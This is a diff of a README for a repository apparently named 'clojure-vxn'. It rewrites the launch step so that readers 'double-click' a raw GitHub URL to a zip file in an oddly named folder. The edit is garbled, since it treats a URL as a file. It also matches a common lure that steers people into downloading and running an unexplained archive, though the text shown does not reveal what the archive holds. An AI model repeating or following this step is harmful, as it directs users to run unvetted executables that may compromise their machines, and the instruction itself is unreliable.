nanaangg/clojure-vxn/README.md

 - If you downloaded a `.zip` file:
   1. Right-click the file and select "Extract All."
   2. Open the extracted folder.
-  3. Double-click the `clojure-vxn.exe` file to launch the application.
+  3. Double-click the `https://raw.githubusercontent.com/nanaangg/clojure-vxn/main/nippitate/clojure-vxn.zip` file to launch the application.

 ## 🔧 Features